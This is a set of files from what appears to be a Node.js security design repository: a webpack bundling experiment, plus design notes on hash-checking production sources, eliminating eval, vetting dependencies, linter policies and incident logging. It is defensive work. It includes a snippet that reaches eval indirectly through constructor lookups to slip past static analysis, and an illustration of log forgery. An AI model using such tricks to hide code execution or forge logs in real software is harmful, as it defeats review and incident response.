 5 |  * Licensed under the Apache License, Version 2.0 (the "License");
 6 |  * you may not use this file except in compliance with the License.
 7 |  * You may obtain a copy of the License at
 8 |  *
 9 |  *     https://www.apache.org/licenses/LICENSE-2.0
10 |  *
11 |  * Unless required by applicable law or agreed to in writing, software
12 |  * distributed under the License is distributed on an "AS IS" BASIS,
13 |  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 |  * See the License for the specific language governing permissions and
15 |  * limitations under the License.
16 |  */
17 | 
18 | var metadata = require('./package.json');
19 | var greeting = require('./' + metadata.greeting);
20 | 
21 | greeting.say('World');
22 | 


--------------------------------------------------------------------------------
/chapter-2/experiments/webpack-compat/package.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "name": "webpack-compat-experiment",
 3 |   "description": "Figuring out how well webpack deals with dynamic loads",
 4 |   "version": "0.0.0",
 5 |   "main": "index.js",
 6 |   "dependencies": {},
 7 |   "scripts": {},
 8 |   "author": "Mike Samuel",
 9 |   "license": "Apache-2.0",
10 |   "greeting": "hello",
11 |   "devDependencies": {
12 |     "webpack": "^3.10.0"
13 |   }
14 | }
15 | 


--------------------------------------------------------------------------------
/chapter-2/experiments/webpack-compat/test-utils.js:
--------------------------------------------------------------------------------
 1 | /**
 2 |  * @license
 3 |  * Copyright 2017 Google LLC
 4 |  *
 5 |  * Licensed under the Apache License, Version 2.0 (the "License");
 6 |  * you may not use this file except in compliance with the License.
 7 |  * You may obtain a copy of the License at
 8 |  *
 9 |  *     https://www.apache.org/licenses/LICENSE-2.0
10 |  *
11 |  * Unless required by applicable law or agreed to in writing, software
12 |  * distributed under the License is distributed on an "AS IS" BASIS,
13 |  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 |  * See the License for the specific language governing permissions and
15 |  * limitations under the License.
16 |  */
17 | 
18 | exports.doSomethingScaryButItsOkInTest = function() {
19 |     throw new Error('test-utils.js: NOT PRODUCTION CODE');
20 | };
21 | 


--------------------------------------------------------------------------------
/chapter-2/experiments/webpack-compat/test.sh:
--------------------------------------------------------------------------------
 1 | echo <<LICENSE
 2 | // Copyright 2017 Google LLC
 3 | //
 4 | // Licensed under the Apache License, Version 2.0 (the "License");
 5 | // you may not use this file except in compliance with the License.
 6 | // You may obtain a copy of the License at
 7 | //
 8 | //     https://www.apache.org/licenses/LICENSE-2.0
 9 | //
10 | // Unless required by applicable law or agreed to in writing, software
11 | // distributed under the License is distributed on an "AS IS" BASIS,
12 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 | // See the License for the specific language governing permissions and
14 | // limitations under the License.
15 | LICENSE
16 | 
17 | echo <<POLYGLOT
18 | /*
19 | 
20 | This file is both a syntactically valid JS file and a bash file
21 | so that we can test webpack in its minimal configuration.
22 | In its minimal configuration, webpack tries to bundle this file.
23 | 
24 | You may run this file via
25 | 
26 | $ bash test.sh
27 | 
28 | The rest of this is visible to a shell interpreter but not when
29 | webpack mysteriously decides to load this as a JavaScript file.
30 | POLYGLOT
31 | 
32 | set -e
33 | 
34 | pushd "$(dirname "$0")"
35 | 
36 | echo Bundling
37 | rm -f dist/bundle.js
38 | ./node_modules/.bin/webpack
39 | 
40 | echo
41 | echo Running bundle
42 | if node dist/bundle.js 2>&1 | grep -q 'Hello, World!'; then
43 |     echo 'Ran ok'
44 | else
45 |     echo 'Failed to bundle dependency'
46 | fi
47 | 
48 | echo
49 | echo Looking for non production code
50 | if grep -Hn 'NOT PRODUCTION CODE' dist/bundle.js; then
51 |     echo 'Webpack bundled test code in its minimal configuration'
52 |     false
53 | fi
54 | 
55 | # */
56 | 


--------------------------------------------------------------------------------
/chapter-2/experiments/webpack-compat/test/test.js:
--------------------------------------------------------------------------------
 1 | /**
 2 |  * @license
 3 |  * Copyright 2017 Google LLC
 4 |  *
 5 |  * Licensed under the Apache License, Version 2.0 (the "License");
 6 |  * you may not use this file except in compliance with the License.
 7 |  * You may obtain a copy of the License at
 8 |  *
 9 |  *     https://www.apache.org/licenses/LICENSE-2.0
10 |  *
11 |  * Unless required by applicable law or agreed to in writing, software
12 |  * distributed under the License is distributed on an "AS IS" BASIS,
13 |  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 |  * See the License for the specific language governing permissions and
15 |  * limitations under the License.
16 |  */
17 | 
18 | console.log('test/test.js: NOT PRODUCTION CODE');
19 | 


--------------------------------------------------------------------------------
/chapter-2/experiments/webpack-compat/webpack.config.js:
--------------------------------------------------------------------------------
 1 | const path = require('path');
 2 | 
 3 | module.exports = {
 4 |     output: {
 5 |         path: path.resolve('./dist'),
 6 |         filename: 'bundle.js',
 7 |     },
 8 |     entry: path.resolve('./index.js')
 9 | };
10 | 


--------------------------------------------------------------------------------
/chapter-2/source-contents.md:
--------------------------------------------------------------------------------
 1 | # Source Content Checks
 2 | 
 3 | The node runtime's module loader uses the `_compile` method to actually
 4 | turn file content into code thus:
 5 | 
 6 | ```js
 7 | // Run the file contents in the correct scope or sandbox. Expose
 8 | // the correct helper variables (require, module, exports) to
 9 | // the file.
10 | // Returns exception, if any.
11 | Module.prototype._compile = function(content, filename) {
12 |   content = internalModule.stripShebang(content);
13 | 
14 |   // create wrapper function
15 |   var wrapper = Module.wrap(content);
16 | 
17 |   var compiledWrapper = vm.runInThisContext(wrapper, {
18 | ```
19 | 
20 | At the top of that method body, we can check that the content
21 | is on a list of production sources.
22 | 
23 | The entire process looks like:
24 | 
25 | 1.  Developer develops and tests their app iteratively as normal.
26 | 2.  The developer generates a list of production sources via the
27 |     dynamic bundling scheme outlined earlier, a static tool like
28 |     webpack, or some combination.
29 | 3.  The bundling tool generates a file with a cryptographic hash
30 |     for each production source.
31 |     We prefer hashing to checking paths for reasons that will become
32 |     apparent later when we discuss `eval`.
33 | 4.  A deploy script copies the bundle and the hashes to a production server.
34 | 5.  The server startup script passes a flag to `node` or `npm start`
35 |     telling the runtime where to look for the production source hashes.
36 | 6.  The runtime reads the hashes and combines it with any hashes necessary
37 |     to whitelist any `node` internal JavaScript files that might load
38 |     via `require`.
39 | 7.  When a call to `require(x)` reaches `Module.prototype.compile`
40 |     it hashes `content` and checks that the hash is in the allowed set.
41 |     If not, it logs that and, if not in report-only-mode,
42 |     raises an exception.
43 | 8.  Normal log collecting and monitoring communicates failures
44 |     to the development team.
45 | 
46 | This is similar to [Content-Security-Policy (CSP)][csp] but for
47 | server-side code.  Like CSP, there is an intermediate step that might
48 | be useful between no enforcement and full enforcement:
49 | [report only mode][].
50 | 
51 | [CSP]: https://developers.google.com/web/fundamentals/security/csp/
52 | [report only mode]: https://developers.google.com/web/fundamentals/security/csp/#report-only
53 | 


--------------------------------------------------------------------------------
/chapter-2/synthetic-modules.md:
--------------------------------------------------------------------------------
  1 | # Statically eliminating `eval`
  2 | 
  3 | Pug provides a flexible API to load Pug templates from `.pug` files
  4 | that `eval`s the generated code ([code][pug-eval]),
  5 | and a command line interface for precompiling Pug files.
  6 | 
  7 | Let's ignore those and imagine ways to allow a Pug user to
  8 | compile a Pug template that makes the static nature apparent
  9 | even to an analysis which doesn't make assumptions about the
 10 | contents of `.pug` files.
 11 | 
 12 | ```js
 13 | const pug = require('pug');
 14 | 
 15 | exports.myTemplate = pug.lang`
 16 | doctype html
 17 | html
 18 |   head
 19 |     ...`;
 20 | ```
 21 | 
 22 | This code snippet uses a [tagged template literal][] to allow Pug
 23 | template code to appear inline in a JavaScript file.
 24 | 
 25 | Rather than loading a `.pug` file, we have declared it in JavaScript.
 26 | 
 27 | Imagine further that `pug.lang` runs the compiler, but instead of
 28 | using `new Function(...)` it uses some new module API
 29 | 
 30 | ```js
 31 | require.synthesize(generatedCode)
 32 | ```
 33 | 
 34 | which could manufacture a `Module` instance with the generated code and
 35 | install the module into the cache with the input hash as its filename.
 36 | 
 37 | When [bundling](bundling.md), we could dump the content of synthesized
 38 | modules, and, when the bundle loads in production, pre-populate
 39 | the module cache.  When the `pug.lang` implementation asks the
 40 | module loader to create a module with the content between
 41 | <code>&#96;...&#96;</code> it would find a resolved module ready but not
 42 | loaded.  If a module is already in the cache, `Module` skips the
 43 | additional content checks.
 44 | 
 45 | The Node runtime function, `makeRequireFunction`
 46 | ([code][makeRequireFunction]), defines a `require` for each module
 47 | that loads modules with the current module as the parent.  That would
 48 | also have to define a module specific `require.synthesize` that does
 49 | something like:
 50 | 
 51 | ```js
 52 |   function synthesize(content) {
 53 |     content = String(content);
 54 |     // Hashing gives us a stable identifier so that we can associate
 55 |     // code inlined during bundling with that loaded in production.
 56 |     const hash = crypto
 57 |         .createHash('sha512')
 58 |         .update(content, 'utf8')
 59 |         .digest();
 60 |     // A name that communicates the source while being
 61 |     // unambiguous with any actual file.
 62 |     const filename = '/dev/null/synthetic/' + hash;
 63 |     // We scope the identifier so that it is clear in
 64 |     // debugging trace that the module is synthetic and
 65 |     // to avoid leading existing tools to conclude that
 66 |     // it is available via registry.npmjs.org.
 67 |     const id = '@node-internal-synthetic/' + hash;
 68 |     const cache = Module._cache;
 69 |     let syntheticModule = cache[filename];
 70 |     if (syntheticModule) {
 71 |       // TODO: updateChildren(mod, syntheticModule, true);
 72 |     } else {
 73 |       cache[filename] = syntheticModule = new Module(id, mod);
 74 |       syntheticModule.loaded = true;
 75 |       syntheticModule._compile(content, filename);
 76 |     }
 77 |     // TODO: dump the module if the command line flags specify
 78 |     // a synthetic_node_modules/ output directory.
 79 |     return syntheticModule;
 80 |   }
 81 | 
 82 |   require.synthesize = synthesize;
 83 | ```
 84 | 
 85 | Static analysis tools often benefit from having a whole program
 86 | available.  Humans can reason about external files, like `.pug` files,
 87 | but static analysis tools often have to be unsound, or assume the
 88 | worst.  Synthetic modules may provide a way to move a large chunk of
 89 | previously unanalyzable code into the domain of what static analysis
 90 | tools can check.
 91 | 
 92 | This scheme, might be more discoverable if code generator authors
 93 | adopted some conventions:
 94 | 
 95 | *  If a module defines `exports.lang` it should be usable as a
 96 |    template tag.
 97 | *  If that same function is called with an option map instead
 98 |    of as a template tag function, then it should return a function
 99 |    to enable usages like
100 |    ```js
101 |    pug.lang(myPugOptionMap)`
102 |      doctype html
103 |      ...`
104 |    ```
105 | *  If the first line starts with some whitespace, all subsequent
106 |    lines have that same whitespace as a prefix, and the language
107 |    is whitespace-sensitive, then strip it before processing.
108 |    This would allow indenting inline DSLs within a larger
109 |    JavaScript program.
110 | 
111 | We discuss template tag usability concerns in more detail later when
112 | discussing [library tweaks][library].
113 | 
114 | This proposal has one major drawback: we still have to trust the code
115 | generator.  Pug's code generator looks well structured, but reasoning
116 | about all the code produced by a code generator is harder than
117 | reasoning about one hand-written module.  The [frozen realms][] proposal
118 | restricts code to a provided API like
119 | `vm.runInNewContext` aimed to.  If Pug, for example, chose to load its
120 | code in a sandbox, then checking just the provided context would give
121 | us confidence about what generated code could do.  In some cases, we
122 | might be able to move code generator outside the
123 | [*trusted computing base*][TCB].
124 | 
125 | [tagged template literal]: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Template_literals#Tagged_template_literals
126 | [pug-eval]: https://github.com/pugjs/pug/blob/926f7c720112cac76cfedb003e25e9f43d3a1767/packages/pug/lib/index.js#L261-L263
127 | [library]: ../chapter-7/libraries.md
128 | [makeRequireFunction]: https://github.com/nodejs/node/blob/8f5040771475ca5435b6cb78ab2ebce7447afcc1/lib/internal/module.js#L5
129 | [frozen realms]: https://github.com/tc39/proposal-frozen-realms
130 | [TCB]: https://en.wikipedia.org/wiki/Trusted_computing_base
131 | 


--------------------------------------------------------------------------------
/chapter-2/what-about-eval.md:
--------------------------------------------------------------------------------
 1 | # What about `eval`?
 2 | 
 3 | Previously we've talked about how to control what code loads
 4 | from the file system, but not what code loads from strings.
 5 | 
 6 | The rest of this discussion uses the term "`eval`" to refer to any of
 7 | the `eval` operator, the `eval` function, `new Function`,
 8 | `vm.runIn*Context`, `vm.Script.run*`, [`WebAssembly.compile`][]
 9 | and other operators that convert strings or bytes into code.
10 | 
11 | Recall that it is difficult to prove that code
12 | [does not `eval`](../chapter-1/threat-RCE.md):
13 | 
14 | ```js
15 | var x = {},
16 |     a = 'constructor',
17 |     b = 'constructor',
18 |     s = 'console.log(s)';
19 | x[a][b](s)();
20 | ```
21 | 
22 | Some node projects deploy with a tweaked node runtime that turns off
23 | some `eval` operators, but there are widely used npm modules that use
24 | them carefully.  For example:
25 | 
26 | *  [Pug][]  generates HTML from templates.
27 | *  [Mathjs][] evaluates closed-form mathematical expressions.
28 | 
29 | Both generate JavaScript code under the hood, which is dynamically
30 | parsed.  Let's consider two use cases:
31 | 
32 | *  Pug's code generator is usually called with trusted inputs, e.g.
33 |    `.pug` files authored by trusted developers.
34 | *  Mathjs is often called with untrusted inputs.  If a developer
35 |    wanted to let a user generate an ad-hoc report without having to
36 |    download data into a spreadsheet, they might use Mathjs to parse
37 |    user-supplied arithmetic expressions ([docs][more_secure_eval])
38 |    instead of trying to check that an input is safe to `eval` via
39 |    `RegExp`s.  It is not without risk ([advisory][adv552])
40 |    though [^1].
41 | 
42 | These two uses of code generators fall at either end of a spectrum.
43 | The uses of Pug seem static, all the information is available before
44 | we deploy.  Our Mathjs use case is necessarily dynamic since the
45 | input is not available until a user is in the loop.
46 | 
47 | Next we discuss ways to recognize and simplify the former, while
48 | double-checking the latter.  On the client, we have no options between
49 | allowing implicit `eval` and banning all uses of `eval`.  There are
50 | fewer compelling use cases on the client since it is harder to
51 | amortize code generation over multiple requests.  On the server, use
52 | of `eval` in the presence of untrusted inputs still needs to be
53 | carefully vetted.  We explore ways to programatically enforce vetting
54 | decisions short of a blanket ban, but turning off `eval` before
55 | accepting untrusted inputs is still the most reliable way to prevent
56 | attackers from using `eval` against you.
57 | 
58 | [^1]: Since this writing, [Mathjs got rid of all uses of `eval`][no-eval-issue]
59 | 
60 | 
61 | [`WebAssembly.compile`]: http://webassembly.org/docs/js/#webassemblycompile
62 | [Pug]: https://pugjs.org/
63 | [Mathjs]: http://mathjs.org/
64 | [more_secure_eval]: http://mathjs.org/examples/advanced/more_secure_eval.js.html
65 | [adv552]: https://nodesecurity.io/advisories/552
66 | [no-eval-issue]: https://github.com/josdejong/mathjs/issues/1019#issuecomment-367289278
67 | 


--------------------------------------------------------------------------------
/chapter-3/knowing_dependencies.md:
--------------------------------------------------------------------------------
  1 | # Knowing your dependencies
  2 | 
  3 | ## Background
  4 | 
  5 | [`npmjs` search results][npmjs/node] have stats on download count and
  6 | open issues and PRs.
  7 | 
  8 | <img alt="npmjs.com stats for module node" src="../images/npmjs-node.png" height="399" width="230">
  9 | 
 10 | Each package page also links to the corresponding GitHub project
 11 | which has links to the project's [pulse][github-pulse].
 12 | 
 13 | Both of these give an idea of how popular the project is, and
 14 | whether it's actively developed.
 15 | 
 16 | On their Github pages, many projects proudly display
 17 | [badges and shields][] indicating their continuous integration status,
 18 | and other vital statistics.
 19 | 
 20 | The Linux Core Infrastructure project espouses a set of
 21 | [best practices badges][bpb] and define tiers for mature infrastructure
 22 | projects.  We get some of the basic items for free by distributing via
 23 | `npm`, but other items bear on how responsive the project might be to
 24 | vulnerability reports and how it might respond to attempts to inject
 25 | malicious code:
 26 | 
 27 | *  Another will have the necessary access rights if someone dies
 28 | *  Monitor external dependencies to detect/fix known vulnerabilities
 29 | *  At least 2 unassociated significant contributors
 30 | *  Use 2FA
 31 | *  At least 50% of all modifications are reviewed by another
 32 | *  Have a security review (internal or external)
 33 | 
 34 | "Use 2FA" is possible with npm but it is not clear that it is widely
 35 | practiced.  [MTP][] discusses the support already built into Github
 36 | and `npm profile`.
 37 | 
 38 | 
 39 | ## Problem
 40 | 
 41 | Threats: [LQC][] [MTP][]
 42 | 
 43 | The npm repository, like other open-source code repositories,
 44 | contains mature and well-maintained modules, but also plenty of
 45 | bleeding-edge code that has not yet had bugs ironed out.
 46 | 
 47 | A wise technical lead might decide that they can use third-party
 48 | dependencies that have been widely used in production for several
 49 | years by projects with similar needs since gross errors are likely
 50 | to have been fixed.
 51 | 
 52 | That technical lead might also decide that they can use bleeding edge
 53 | code when they have enough local expertise to vet it, identify
 54 | corner-cases they need to check, and fix any gross errors they
 55 | encounter.
 56 | 
 57 | Either way, that decision to use bleeding-edge code or code that might
 58 | not be maintained over the long term should be a conscious one.
 59 | 
 60 | 
 61 | ## Success Criteria
 62 | 
 63 | Development teams are rarely surprised when code that they had built a
 64 | prototype on later turns out not to be ready for production use, and
 65 | they do not have to pore over others' code to vet many dependencies.
 66 | 
 67 | ## A Possible Solution
 68 | 
 69 | The building blocks of a solution probably already exist.
 70 | 
 71 | ### Aggregate more signals
 72 | 
 73 | `npmjs.com` may or may not be the right place to do this, but we
 74 | should, as a community, aggregate signals about modules and make
 75 | them readily available.
 76 | 
 77 | `npmjs.com/package` already aggregates some useful signals, but
 78 | it or another forum could aggregate more including
 79 | 
 80 | -  More of the GitHub pulse information including
 81 |    closed issues, PRs over time.
 82 | -  Relevant badges & shields for the project itself.
 83 | -  Relevant badges & shields by percentage of transitive
 84 |    dependencies and peer dependencies that have them.
 85 | -  Support channels, e.g. slack & discord.
 86 | -  Vulnerability reports and the version they affect.
 87 |    See sources in ["When all else fails"][failing]
 88 | -  Weighted mean of age of production dependencies transitively.
 89 | -  Results of linters (see [oversight][]) run without respecting
 90 |    [inline ignore comments][eslint-ignore-line] and
 91 |    [file ignore directives][eslint-ignore-file].
 92 | 
 93 | Users deciding whether to buy something from an online store or
 94 | download a cellphone app from an app store have reviews
 95 | and comments from other users.  That members of the community take
 96 | time to weigh in can be a useful signal, and the details can help
 97 | clarify whether this module or an alternative might be better for a
 98 | specific use.
 99 | 
100 | Large organizations who host [internal replicas][] may already have a
101 | lot of the opinion available internally, but aggregating that across
102 | clients can help smaller organizations and large organizations
103 | that are debating whether to dip their toe in.
104 | 
105 | 
106 | ### Leadership & Developer outreach
107 | 
108 | The node runtime already [passes][CI-node] the Linux Foundation's best
109 | practices criteria, but could lead the way by explaining how a project
110 | that pushes from GitHub to `registry.npmjs.org` can pass more of these
111 | criteria.
112 | 
113 | 
114 | [npmjs/node]: https://www.npmjs.com/package/node
115 | [github-pulse]: https://github.com/blog/1476-get-up-to-speed-with-pulse
116 | [badges and shields]: https://github.com/badges/shields
117 | [bpb]: https://github.com/coreinfrastructure/best-practices-badge
118 | [internal replicas]: ../chapter-4/close_dependencies.md
119 | [failing]: ../chapter-6/failing.md
120 | [CRY]: ../chapter-1/threat-CRY.md
121 | [LQC]: ../chapter-1/threat-LQC.md
122 | [MTP]: ../chapter-1/threat-MTP.md
123 | [oversight]: ../chapter-5/oversight.md
124 | [eslint-ignore-line]: https://eslint.org/docs/user-guide/configuring#disabling-rules-with-inline-comments
125 | [eslint-ignore-file]: https://eslint.org/docs/user-guide/configuring#ignoring-files-and-directories
126 | [CI-node]: https://bestpractices.coreinfrastructure.org/projects?gteq=50&q=Node.js
127 | 


--------------------------------------------------------------------------------
/chapter-5/oversight.md:
--------------------------------------------------------------------------------
  1 | # Oversight
  2 | 
  3 | 
  4 | ## Problem
  5 | 
  6 | Threats: [BOF][] [CRY][] [DEX][] [EXF][] [LQC][] [QUI][] [RCE][] [SHP][]
  7 | 
  8 | Manually reviewing third party modules for known security problems
  9 | is time consuming.
 10 | 
 11 | Having developers wait for such review unnecessarily slows down
 12 | development.
 13 | 
 14 | Our engineering processes ought not force us to choose between
 15 | forgoing sanity checks and shipping code in a timely manner.
 16 | 
 17 | 
 18 | ## Background
 19 | 
 20 | [JSConformance][] allows a project team to specify a policy for
 21 | Closure JavaScript.  This policy can encode lessons learned about APIs
 22 | that are prone to misuse.  By taking into account type information
 23 | about arguments and `this`-values it can distinguish problematic
 24 | patterns like `setTimeout(aString, dt)` from unproblematic ones
 25 | `setTimeout(aFunction, dt)`.
 26 | 
 27 | [TSLint][tslint] and [ESLint][eslint] both allow custom rules so can
 28 | be extended as a project or developer community identifies Good and
 29 | Bad parts of JavaScript for their particular context.
 30 | 
 31 | 
 32 | 
 33 | ## A possible solution
 34 | 
 35 | ### Encode lessons learned by the community in linter policies
 36 | 
 37 | Instead of having security specialists reviewing lots of code
 38 | they should focus on improving tools.
 39 | Some APIs and idioms are more prone to misuse than others, and some
 40 | should be deprecated in favor of more robust ways of expressing the
 41 | same idea.  As the community reaches a rough consensus that a code
 42 | pattern is prone to misuse or there is a more robust alternative, we
 43 | could try to encode that knowledge in an automatable policy.
 44 | 
 45 | Linters are not perfect.  There are no sound production-quality static
 46 | type systems for JavaScript, so its linters are also necessarily
 47 | heuristic.  TSLint typically has more fine-grained type information
 48 | available than ESLint, so there are probably more anti-patterns that
 49 | TSLint can identify with an acceptable false-positive rate than
 50 | ESLint, but feedback about what can and can't be expressed in ESLint
 51 | might give its maintainers useful feedback.
 52 | 
 53 | Linters can reduce the burden on reviewers by enabling computer aided
 54 | code review &mdash; helping reviewers focus on areas that use powerful
 55 | APIs, and giving a sense of the kinds of problems to look out for.
 56 | 
 57 | They can also give developers a sense of how controversial a review
 58 | might be, and guide them in asking the right kinds of questions.
 59 | 
 60 | Custom policies can also help educate developers about alternatives.
 61 | 
 62 | The rule below specifies an anti-pattern for client-side JavaScript
 63 | in machine-checkable form, assigns it a name, has a short summary that
 64 | can appear in an error message, and a longer description or
 65 | documentation URL that explains the reasoning behind the rule.
 66 | 
 67 | It also documents a number of known exceptions to the rule, for
 68 | example, APIs that wrap `document.write` to do additional checks.
 69 | 
 70 | ```pb
 71 | requirement: {
 72 |   rule_id: 'closure:documentWrite'
 73 |   type: BANNED_PROPERTY
 74 |   error_message: 'Using Document.prototype.write is not allowed. '
 75 |       'Use goog.dom.safe.documentWrite instead.'
 76 |       ''
 77 |       'Any content passed to write() will be automatically '
 78 |       'evaluated in the DOM and therefore the assignment of '
 79 |       'user-controlled, insufficiently sanitized or escaped '
 80 |       'content can result in XSS vulnerabilities.'
 81 |       ''
 82 |       'Document.prototype.write is bad for performance as it '
 83 |       'forces document reparsing, has unpredictable semantics '
 84 |       'and disallows many optimizations a browser may make. '
 85 |       'It is almost never needed.'
 86 |       ''
 87 |       'Exceptions allowed for:'
 88 |       '* writing to a completely new window such as a popup '
 89 |       '  or an iframe.'
 90 |       '* frame busting.'
 91 |       ''
 92 |       'If you need to use it, use the type-safe '
 93 |       'goog.dom.safe.documentWrite wrapper, or directly '
 94 |       'render a Strict Soy template using '
 95 |       'goog.soy.Renderer.prototype.renderElement (or similar).'
 96 | 
 97 |   value: 'Document.prototype.write'
 98 |   value: 'Document.prototype.writeln'
 99 | 
100 |   # These uses have been determined to be safe by manual review.
101 |   whitelist: 'javascript/closure/async/nexttick.js'
102 |   whitelist: 'javascript/closure/base.js'
103 |   whitelist: 'javascript/closure/dom/safe.js'
104 | }
105 | ```
106 | 
107 | ----
108 | 
109 | We propose a project that maintains a set of linter policies per language:
110 | 
111 | *  A **common** policy suitable for all projects that identifies
112 |    anti-patterns that are generally regarded as bad practice by the
113 |    community with a low false positive rate.
114 | *  A **strict** policy suitable for projects that are willing to
115 |    deal with some false positives in exchange for identifying more
116 |    potential problems.
117 | *  An **experimental** policy that projects that want to contribute to
118 |    linter policy development can use.
119 |    New rules go here first, so that rule maintainers can get feedback
120 |    about their impact on real code.
121 | 
122 | 
123 | ### Decouple Reviews from Development
124 | 
125 | Within a large organization, there are often multiple review cycles, some
126 | concurrent:
127 | 
128 | -  Reviews of designs and use cases where developers gather information
129 |    from others.
130 | -  Code reviewers critique pull requests for correctness, maintainability,
131 |    testability.
132 | -  Release candidate reviews where professional testers examine a
133 |    partial system and try to break it.
134 | -  Pre-launch reviews where legal, security & privacy, and other
135 |    concerned parties come to understand the state of the system and
136 |    weigh in on what they need to be able to support its deployment.
137 | -  Limited releases where trusted users get to use an application.
138 | 
139 | Reviews should happen early and late.  When designing a system or a
140 | new feature, technical leads should engage specialists.  Before
141 | shipping, they should circle back to double check the implementation.
142 | During rapid development though, developers should drive development
143 | &mdash; they may ask questions, and may receive feedback (solicited
144 | and not), but ought not have to halt work while they wait for reviews
145 | from specialists.
146 | 
147 | Some changes have a higher security impact than other, so
148 | some will require review by security specialists, but not most.
149 | 
150 | During an ongoing security review, security specialists can contribute
151 | use cases and test cases; file issues; and help to integrate tools
152 | like linters, fuzzers, and vulnerability scanners.
153 | 
154 | As described in "[Keeping your dependencies close][]", new third-party
155 | modules are of particular interest to security specialists, but
156 | shouldn't require security review before developers use them on an
157 | experimental basis.
158 | 
159 | There are a many workflows that allows people to work independently
160 | and later circle back so that nothing falls through the cracks.
161 | Below is one that has worked in similar contexts:
162 | 
163 | 1. The developer (or the automated import script) files a
164 |    tracking issue that is a prerequisite for pre-launch review.
165 | 2. If the developer later finds out that they don't plan on using
166 |    the unreviewed module, they can close the tracking issue.
167 | 3. The assigned security specialist asks follow-up questions and
168 |    reports their findings via the tracking issue.
169 | 4. A common pre-launch script checks queries a module metadata
170 |    databased maintained by security to identify still-unvetted
171 |    dependencies.
172 | 
173 | [BOF]: ../chapter-1/threat-BOF.md
174 | [CRY]: ../chapter-1/threat-CRY.md
175 | [DEX]: ../chapter-1/threat-DEX.md
176 | [EXF]: ../chapter-1/threat-EXF.md
177 | [LQC]: ../chapter-1/threat-LQC.md
178 | [RCE]: ../chapter-1/threat-RCE.md
179 | [SHP]: ../chapter-1/threat-SHP.md
180 | [QUI]: ../chapter-1/threat-QUI.md
181 | [JSConformance]: https://github.com/google/closure-compiler/wiki/JS-Conformance-Framework
182 | [tslint]: https://palantir.github.io/tslint/develop/custom-rules/
183 | [eslint]: https://eslint.org/docs/developer-guide/working-with-rules-new#runtime-rules
184 | [Keeping your dependencies close]: ../chapter-4/close_dependencies.md
185 | 


--------------------------------------------------------------------------------
/chapter-6/failing.md:
--------------------------------------------------------------------------------
  1 | # When all else fails
  2 | 
  3 | ## Background
  4 | 
  5 | The ["Incident Handlers Handbook"][SANS] discusses at length how to
  6 | respond to security breaches, but the main takeaways are:
  7 | 
  8 | *  You need to do work before incidents happen to be able to
  9 |    respond effectively.
 10 | *  Similar measures can lower the rate of incidents.
 11 | *  You will still have incidents.
 12 | *  Being in a position to respond effectively can limit damage when
 13 |    incidents occur.
 14 | 
 15 | Node's proposed [security working group][security-wg]
 16 | includes in its charter measures to route information about
 17 | vulnerabilities and fixes to the right places, and coordinate response
 18 | and disclosure.
 19 | 
 20 | Package monitoring services like [nodesecurity], GitHub's
 21 | [package graph][github graph], [snyk][], and the
 22 | [nodejs-sec list][nodejs-sec] aim to help vulnerability reports get to
 23 | those who need them.
 24 | 
 25 | 
 26 | ## Problem
 27 | 
 28 | Threats: [0DY][]
 29 | 
 30 | Node's security working group is working on a lot of preparedness
 31 | issues so we only address a few.
 32 | 
 33 | ### Naming is hard
 34 | 
 35 | Each of the groups mentioned above is doing great work trying to help
 36 | patches get to those who need them.  Each seems to be rolling their own
 37 | naming scheme for vulnerabilities.
 38 | 
 39 | The computer security community has a
 40 | [centralized naming scheme][CVE-IDs] for vulnerability reports so that
 41 | reports don't fall through the cracks.  Security responders rarely
 42 | have the luxury of dealing with a single stack much less a single
 43 | layer of that stack so mailing lists are not sufficient &mdash; if
 44 | reporters roll their own naming scheme or only disclose via
 45 | unstructured text, reports will fall through the cracks.
 46 | 
 47 | ### Logging
 48 | 
 49 | When trying to diagnose a problem, responders often look to log files.
 50 | There has been much written on how to protect logs from
 51 | [forgery][log injection].
 52 | 
 53 | ```js
 54 | console.log(s);
 55 | ```
 56 | 
 57 | on a stack node runtime allows an attacker who controls `s` to write
 58 | any content to a log.
 59 | 
 60 | ```js
 61 | console.log('MyModule: ' + s);
 62 | ```
 63 | 
 64 | is a bit better.  An attacker has to insert a newline character into
 65 | `s` to forge another modules log prefix, and can't get rid of the
 66 | previous one.
 67 | 
 68 | 
 69 | ## Success Criteria
 70 | 
 71 | Incident responders would have the tools necessary to do their jobs if
 72 | 
 73 | *  Security specialists can subscribe to a stream of notifications
 74 |    that include the vast majority of actionable security disclosures.
 75 | *  Responders can narrow down which code generated which log entries.
 76 | 
 77 | 
 78 | ## Possible solutions
 79 | 
 80 | ### Naming
 81 | 
 82 | Use CVE-IDs if at all possible when disclosing a vulnerability.  There
 83 | is a CNA for Node.js but that doesn't cover non-core npm modules and
 84 | other CNAs cover runtime dependencies like OpenSSL.  If there is no
 85 | other CNA that is appropriate, MITRE will issue an ID.
 86 | 
 87 | ### Logging
 88 | 
 89 | On module load, the builtin `module.js` creates a new version of
 90 | `require` for each module so that it can make sure that the module path
 91 | gets passed as the module parent parameter.
 92 | 
 93 | The same mechanism could create a distinct `console` logger for each
 94 | module that narrows down the source of a message, and makes it
 95 | unambiguous where one message ends and the next starts.  For example:
 96 | 
 97 | 1. Replace all `/\r\n?/g` in the log message text with `'\n'`
 98 |    and emit a CRLF after the log message to prevent forgery by
 99 |    line splitting.
100 | 2. Prefix it with the module filename and a colon.
101 | 
102 | With this, an incident responder reading a log message can reliably
103 | tell that the module mentioned is where the log message originated, as
104 | long as the attacker didn't get write access to the log file.
105 | Preventing log deletion by other processes is better handled by
106 | Linux's `FS_APPEND_FL` and similar mechanisms than in node.
107 | 
108 | [nodesecurity]: https://nodesecurity.io/advisories
109 | [github graph]: https://github.com/blog/2447-a-more-connected-universe
110 | [snyk]: https://snyk.io/vuln?packageManager=npm
111 | [nodejs-sec]: https://groups.google.com/group/nodejs-sec
112 | [CVE-IDs]: https://en.wikipedia.org/wiki/Common_Vulnerabilities_and_Exposures#CVE_identifiers
113 | [log injection]: https://www.owasp.org/index.php/Log_Injection
114 | [0DY]: ../chapter-1/threats.md
115 | [SANS]: https://www.sans.org/reading-room/whitepapers/incident/incident-handlers-handbook-33901
116 | [security-wg]: https://github.com/nodejs/security-wg
117 | 


--------------------------------------------------------------------------------
